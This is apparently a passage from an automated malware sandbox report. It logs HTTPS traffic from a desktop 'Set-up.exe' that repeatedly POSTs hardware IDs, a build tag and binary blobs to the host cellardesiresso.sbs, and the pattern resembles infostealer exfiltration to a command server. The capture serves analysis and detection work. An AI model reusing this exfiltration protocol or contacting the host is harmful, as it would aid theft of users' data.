                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC1369INData Raw: 41 78 34 70 79 76 74 53 4f 77 51 55 4c 47 72 72 37 61 73 49 39 6b 38 2f 76 75 76 35 38 78 4c 39 6a 37 4b 34 37 4b 63 4a 69 72 67 7a 66 67 72 71 47 6a 61 61 34 47 56 6f 71 6b 74 5a 33 6e 79 69 65 36 75 4f 69 74 31 6d 56 67 2f 76 49 79 69 4a 59 34 32 62 58 47 49 36 79 70 6f 4f 34 37 37 77 39 52 67 36 4f 2f 6d 65 66 4d 64 66 58 2b 2f 62 57 62 4e 7a 4c 56 39 44 79 4a 77 47 2b 61 72 49 34 78 34 4c 79 6c 72 6d 43 6b 54 78 58 47 72 71 72 61 73 49 39 45 34 2b 37 6c 73 70 6f 72 4b 39 37 38 4c 34 6e 64 49 74 66 71 6d 54 33 39 37 76 53 34 63 37 67 49 52 4d 69 77 38 70 33 6b 6a 7a 2b 30 2f 75 61 7a 6b 54 73 75 7a 66 6f 2f 69 38 4a 72 6b 4b 36 41 4f 65 79 71 71 4b 6c 6d 72 41 4e 51 67 61 71 39 6e 75 48 42 62 76 75 34 6f 66 57 52 4a 57 43 48 76 78 69 66 7a 6d 36 55 36
                                                                                                                                                                                                                                                            Data Ascii: Ax4pyvtSOwQULGrr7asI9k8/vuv58xL9j7K47KcJirgzfgrqGjaa4GVoqktZ3nyie6uOit1mVg/vIyiJY42bXGI6ypoO477w9Rg6O/mefMdfX+/bWbNzLV9DyJwG+arI4x4LylrmCkTxXGrqrasI9E4+7lsporK978L4ndItfqmT397vS4c7gIRMiw8p3kjz+0/uazkTsuzfo/i8JrkK6AOeyqqKlmrANQgaq9nuHBbvu4ofWRJWCHvxifzm6U6
                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC376INData Raw: 6e 37 4f 41 6a 71 42 63 62 33 75 6d 53 6b 66 37 4b 59 4f 4b 36 32 72 61 59 4d 79 66 4a 76 79 61 37 67 79 4b 59 36 74 41 44 39 65 36 36 37 6a 76 39 51 52 75 55 36 65 72 61 72 38 78 31 35 76 37 73 6f 35 56 36 48 75 48 59 4c 34 37 4b 63 70 36 39 68 33 71 69 37 71 50 75 4f 35 5a 50 55 6f 47 79 6f 34 7a 6c 33 32 43 30 78 36 48 31 6a 6e 31 34 6e 38 6f 36 69 73 4e 6c 6a 37 76 46 48 66 71 6b 71 37 35 6b 75 41 41 62 79 4f 6d 30 32 72 43 63 4b 62 54 38 2f 76 58 4f 62 58 4b 45 71 6d 72 54 6e 54 43 47 35 4a 46 36 2b 75 37 30 2f 43 33 76 48 52 76 65 36 66 57 5a 2b 74 31 68 39 2b 37 73 38 71 67 44 42 38 58 79 50 35 50 63 58 4b 65 74 6b 6a 66 71 75 62 33 69 64 71 77 42 56 59 47 2f 38 74 53 6f 77 43 65 73 77 61 2f 39 31 67 4a 75 6e 2b 64 35 33 49 31 58 6d 71 53 47 50 66
                                                                                                                                                                                                                                                            Data Ascii: n7OAjqBcb3umSkf7KYOK62raYMyfJvya7gyKY6tAD9e667jv9QRuU6erar8x15v7so5V6HuHYL47Kcp69h3qi7qPuO5ZPUoGyo4zl32C0x6H1jn14n8o6isNlj7vFHfqkq75kuAAbyOm02rCcKbT8/vXObXKEqmrTnTCG5JF6+u70/C3vHRve6fWZ+t1h9+7s8qgDB8XyP5PcXKetkjfqub3idqwBVYG/8tSowCeswa/91gJun+d53I1XmqSGPf
                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC1369INData Raw: 31 64 36 66 0d 0a 59 42 4d 6e 71 79 4e 50 66 7a 73 67 71 56 33 71 45 38 56 78 71 2f 79 77 72 69 42 4a 2f 44 70 72 2b 33 47 62 33 75 4b 72 47 37 55 6e 33 33 58 73 38 67 73 72 50 62 2b 34 43 4f 39 54 77 50 47 37 72 47 49 2b 73 6c 6b 34 76 75 6f 69 36 67 2b 4e 74 4c 77 4d 6f 58 7a 58 4c 65 6e 69 54 6e 69 37 4a 32 34 62 72 38 4d 58 6f 47 58 6a 4a 54 76 32 32 44 36 2f 75 2f 31 32 48 30 76 6e 36 63 41 78 49 55 69 70 75 54 49 49 71 7a 32 37 4a 74 67 6f 51 46 63 6b 4c 6a 2f 75 66 37 43 61 50 2f 35 72 2f 76 57 4f 32 43 48 72 33 66 45 79 58 50 5a 38 74 68 6f 74 2f 76 2f 2b 54 50 39 45 42 57 66 36 61 54 61 73 4a 30 70 74 4f 71 76 37 64 5a 36 4c 74 4c 2b 4f 6f 72 4f 63 49 75 73 69 79 7a 76 36 5a 4b 51 51 71 49 45 56 34 75 6d 75 61 54 57 37 6d 72 2f 39 4f 4b 36 6e 51
                                                                                                                                                                                                                                                            Data Ascii: 1d6fYBMnqyNPfzsgqV3qE8Vxq/ywriBJ/Dpr+3Gb3uKrG7Un33Xs8gsrPb+4CO9TwPG7rGI+slk4vuoi6g+NtLwMoXzXLeniTni7J24br8MXoGXjJTv22D6/u/12H0vn6cAxIUipuTIIqz27JtgoQFckLj/uf7CaP/5r/vWO2CHr3fEyXPZ8thot/v/+TP9EBWf6aTasJ0ptOqv7dZ6LtL+OorOcIusiyzv6ZKQQqIEV4umuaTW7mr/9OK6nQ
                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC1369INData Raw: 4b 49 36 4e 4c 4e 6d 73 79 47 4b 2b 34 4f 79 71 63 75 39 58 43 39 54 79 35 38 6d 2f 6e 7a 58 72 74 76 62 31 67 48 31 34 6a 62 46 35 6c 6f 30 36 32 65 32 4c 4b 50 36 6f 72 37 68 67 36 44 46 6c 6f 37 36 78 69 75 37 4d 57 63 72 54 34 37 4f 52 4a 79 66 5a 32 52 6e 45 67 79 4b 57 36 74 41 44 72 4f 62 73 6b 53 33 76 46 78 76 65 36 59 65 5a 35 73 46 67 34 75 6d 69 6b 49 45 2b 4d 4e 6e 38 65 63 71 4e 5a 4e 6e 79 32 48 53 73 71 72 33 75 4f 2f 39 64 41 4e 50 36 35 63 71 36 30 43 6e 74 75 50 6e 31 7a 6d 39 75 6e 2b 31 35 33 49 30 6c 6d 72 69 61 50 4f 2b 34 72 2b 6c 64 6b 53 6c 59 6c 36 4f 54 6c 2f 6a 49 57 63 72 74 37 4c 75 59 4f 6a 62 4f 76 33 66 45 77 69 4c 42 6b 38 68 79 6f 4b 69 76 75 43 4f 51 51 52 75 65 36 65 72 61 33 63 78 70 2b 76 2f 35 70 4e 73 62 49 38 37
                                                                                                                                                                                                                                                            Data Ascii: KI6NLNmsyGK+4Oyqcu9XC9Ty58m/nzXrtvb1gH14jbF5lo062e2LKP6or7hg6DFlo76xiu7MWcrT47ORJyfZ2RnEgyKW6tADrObskS3vFxve6YeZ5sFg4umikIE+MNn8ecqNZNny2HSsqr3uO/9dANP65cq60CntuPn1zm9un+153I0lmriaPO+4r+ldkSlYl6OTl/jIWcrt7LuYOjbOv3fEwiLBk8hyoKivuCOQQRue6era3cxp+v/5pNsbI87


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2192.168.2.449750104.21.87.84433492C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-05 17:53:18 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=9JRIGM89O7
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 18115
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
                                                                                                                                                                                                                                                            2025-01-05 17:53:18 UTC15331OUTData Raw: 2d 2d 39 4a 52 49 47 4d 38 39 4f 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 37 43 46 34 35 42 38 45 38 33 37 31 37 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 39 4a 52 49 47 4d 38 39 4f 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 4a 52 49 47 4d 38 39 4f 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4a 45 4e 59 41 0d 0a 2d 2d 39 4a 52 49 47 4d 38 39 4f 37 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                                            Data Ascii: --9JRIGM89O7Content-Disposition: form-data; name="hwid"C127CF45B8E8371785E74BC4E94691B5--9JRIGM89O7Content-Disposition: form-data; name="pid"2--9JRIGM89O7Content-Disposition: form-data; name="lid"hRjzG3--JENYA--9JRIGM89O7Content-
                                                                                                                                                                                                                                                            2025-01-05 17:53:18 UTC2784OUTData Raw: c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f
                                                                                                                                                                                                                                                            Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_
                                                                                                                                                                                                                                                            2025-01-05 17:53:19 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:19 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=5t6uaeit4mnvlbiljaklto2sft; expires=Thu, 01 May 2025 11:39:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UwF7Gy5TIVz1z1J1tPeN1%2FMwaqL3Q%2B5j017EtT7skZ6KJRCDPzh8kdT4ehK2yHVd5NcbM3IVKQm1Mkt7gp4rquPyC4q7Es3gMV10mgI2YADN%2B%2BM2a4DvTBQUX%2FNyq5dg9Wc93Uiw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553bb0e9a4388-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2204&min_rtt=2201&rtt_var=832&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2850&recv_bytes=19072&delivery_rate=1310592&cwnd=221&unsent_bytes=0&cid=1b2d2cb817ae74e4&ts=972&x=0"
                                                                                                                                                                                                                                                            2025-01-05 17:53:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2025-01-05 17:53:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            3192.168.2.449751104.21.87.84433492C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-05 17:53:20 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=4LOL4O0HVV003F1EU
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8778
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
                                                                                                                                                                                                                                                            2025-01-05 17:53:20 UTC8778OUTData Raw: 2d 2d 34 4c 4f 4c 34 4f 30 48 56 56 30 30 33 46 31 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 37 43 46 34 35 42 38 45 38 33 37 31 37 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 34 4c 4f 4c 34 4f 30 48 56 56 30 30 33 46 31 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 4c 4f 4c 34 4f 30 48 56 56 30 30 33 46 31 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4a 45 4e 59 41 0d 0a 2d
                                                                                                                                                                                                                                                            Data Ascii: --4LOL4O0HVV003F1EUContent-Disposition: form-data; name="hwid"C127CF45B8E8371785E74BC4E94691B5--4LOL4O0HVV003F1EUContent-Disposition: form-data; name="pid"2--4LOL4O0HVV003F1EUContent-Disposition: form-data; name="lid"hRjzG3--JENYA-
                                                                                                                                                                                                                                                            2025-01-05 17:53:20 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:20 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=42l13no9nfu4lritgdd5emv847; expires=Thu, 01 May 2025 11:39:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YP68bKANhVSlseYcLASoYGQba7gWMUGKjdxcPIxsqAcH%2Bkq07ERruXrvZ9qdAv01VXEIl73%2Ffr0xizs4stb7twYwryKis%2FcOuyWyWGGDx3xZMFimxAIUuMebTlpT%2FX%2BbKr8MmB1%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553c4ff897cea-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1906&rtt_var=729&sent=11&recv=15&lost=0&retrans=0&sent_bytes=2850&recv_bytes=9719&delivery_rate=1486761&cwnd=226&unsent_bytes=0&cid=3211bdfe8046996c&ts=580&x=0"
                                                                                                                                                                                                                                                            2025-01-05 17:53:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2025-01-05 17:53:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            4192.168.2.449752104.21.87.84433492C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-05 17:53:21 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=1CTPDNSQLA59CQLB
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20425
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
                                                                                                                                                                                                                                                            2025-01-05 17:53:21 UTC15331OUTData Raw: 2d 2d 31 43 54 50 44 4e 53 51 4c 41 35 39 43 51 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 37 43 46 34 35 42 38 45 38 33 37 31 37 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 31 43 54 50 44 4e 53 51 4c 41 35 39 43 51 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 43 54 50 44 4e 53 51 4c 41 35 39 43 51 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4a 45 4e 59 41 0d 0a 2d 2d 31 43
                                                                                                                                                                                                                                                            Data Ascii: --1CTPDNSQLA59CQLBContent-Disposition: form-data; name="hwid"C127CF45B8E8371785E74BC4E94691B5--1CTPDNSQLA59CQLBContent-Disposition: form-data; name="pid"3--1CTPDNSQLA59CQLBContent-Disposition: form-data; name="lid"hRjzG3--JENYA--1C
                                                                                                                                                                                                                                                            2025-01-05 17:53:21 UTC5094OUTData Raw: 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                            2025-01-05 17:53:22 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:22 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ht2nlv43hleau5l39pphhmbnlu; expires=Thu, 01 May 2025 11:40:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rEUdFJFPm2kC8Pku3CjFpHebh5fyhbKGjA%2BFGU51d9nNmomMUrCD0QLm%2B1jtqoD4zz5JJlAzmJ8sK5sn2TgcApXGQG4sJzIIPE4eZHrRQTTac3SprWk83Rnv7VO5FV4DHQ9OV5aq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553cc78dc42ce-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1600&rtt_var=613&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2850&recv_bytes=21388&delivery_rate=1766485&cwnd=233&unsent_bytes=0&cid=90cdea033cdb32d2&ts=938&x=0"
                                                                                                                                                                                                                                                            2025-01-05 17:53:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2025-01-05 17:53:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            5192.168.2.449753104.21.87.84433492C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-05 17:53:23 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=1I1ML2QD2
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 944
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
                                                                                                                                                                                                                                                            2025-01-05 17:53:23 UTC944OUTData Raw: 2d 2d 31 49 31 4d 4c 32 51 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 37 43 46 34 35 42 38 45 38 33 37 31 37 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 31 49 31 4d 4c 32 51 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 49 31 4d 4c 32 51 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4a 45 4e 59 41 0d 0a 2d 2d 31 49 31 4d 4c 32 51 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                                                                                                                                                            Data Ascii: --1I1ML2QD2Content-Disposition: form-data; name="hwid"C127CF45B8E8371785E74BC4E94691B5--1I1ML2QD2Content-Disposition: form-data; name="pid"1--1I1ML2QD2Content-Disposition: form-data; name="lid"hRjzG3--JENYA--1I1ML2QD2Content-Disp
                                                                                                                                                                                                                                                            2025-01-05 17:53:23 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:23 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=p48o41usnsji53ndc1odvb8phd; expires=Thu, 01 May 2025 11:40:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oAz1Ty2r99WwFzYxBQw6Z2uAHml6zt%2ByJsBgbuM4lPLz8fySRdrOHc6CRAN2tAfhoYB14KP052fuRC2SHWQ1Gh1pYcA5ePrnq5UbLt05Ict%2FhuFk26PDI5obw7P3cWO180F09fBR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553da1f306a5f-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1577&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1854&delivery_rate=1813664&cwnd=188&unsent_bytes=0&cid=31be39aeeaee14a0&ts=489&x=0"
                                                                                                                                                                                                                                                            2025-01-05 17:53:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2025-01-05 17:53:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            6192.168.2.449755104.21.87.84433492C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
